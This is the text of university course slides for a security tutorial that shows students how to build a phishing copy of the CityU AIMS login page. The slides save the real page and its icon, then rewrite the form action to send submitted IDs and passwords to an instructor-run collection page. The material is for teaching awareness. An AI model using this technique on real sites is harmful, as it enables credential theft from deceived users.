Tutorial 2

Internet Security
GE2338 Internet Applications and Security

All the teaching materials of this course are for

educational purposes only. They should not be abused.
The course leader and lecturer of this course are not
responsible for any damage or legal issue that you may
create.
Building a Phishing Website
Student ID Password
Phishing CityU AIMS
Website 12345678 abc

… …

2: Redirect to
https://banweb.cityu.edu.hk/pls/PRO
D/twgkpswd_cityu.P_WWWLogin
1: Enter EID and Password

3: Show a login page

Actual CityU
User
GE2338 © By Dr. Chi-Yin Chow AIMS Website 2
Step 1: Copy Web Interface (1/3)
Open Google Chrome
Go to CityU AIMS login page

GE2338 © By Dr. Chi-Yin Chow 3

Step 1: Copy Web Interface (2/3)
Click the top-right “Customize and
control Google Chrome” icon
Select “More tools”
Select “Save page as…”

GE2338 © By Dr. Chi-Yin Chow 4

Step 1: Copy Web Interface (3/3)
Select C:\temp directory
Type index.htm as File name
Select “Webpage, Complete”
as Save as type
Click “Save” button

GE2338 © By Dr. Chi-Yin Chow 5

Step 2: Browse index.htm
Open Google Chrome to browse the saved index.htm file (drag and drop the
index.htm to Google Chrome)
Only the favour icon is missing

GE2338 © By Dr. Chi-Yin Chow 6

Step 3: Copy Favour Icon (1/3)
View the favour icon at https://template.cityu.edu.hk/favicon.ico
Right click the icon and
select “Save image as...”
Select C:\temp\index_files\ and
click “Save” button

GE2338 © By Dr. Chi-Yin Chow 7

Step 3: Copy Favour Icon (2/3)
Use Notepad to open index.htm
Copy <link rel="icon" type= "image/x-icon" href="index_files/favicon.ico" />
and paste it after <head>
Press Ctrl-S to save the file

GE2338 © By Dr. Chi-Yin Chow 8

Step 3: Copy Favour Icon (3/3)
Refresh the index.htm to
display the favour icon

GE2338 © By Dr. Chi-Yin Chow 9

Step 4: Revise the HTML Form
Use Notepad to search <form
Change
action="https://banweb.cityu.edu.hk/pls/PROD/twgkpswd_cityu.P_WWWLog
in" to action=" https://www.cs.cityu.edu.hk/~kclee/GE2338/phish/"

GE2338 © By Dr. Chi-Yin Chow 10

Step 5: Testing (1/2)
Refresh the index.htm
Enter your EID and make up a password (DO NOT your real password)
Click Login button

GE2338 © By Dr. Chi-Yin Chow 11

Step 5: Testing (2/2)
Go to https://www.cs.cityu.edu.hk/~kclee/GE2338/phish/
You can see your input EID and password
(To protect privacy, some characters are deliberately removed)

GE2338 © By Dr. Chi-Yin Chow 12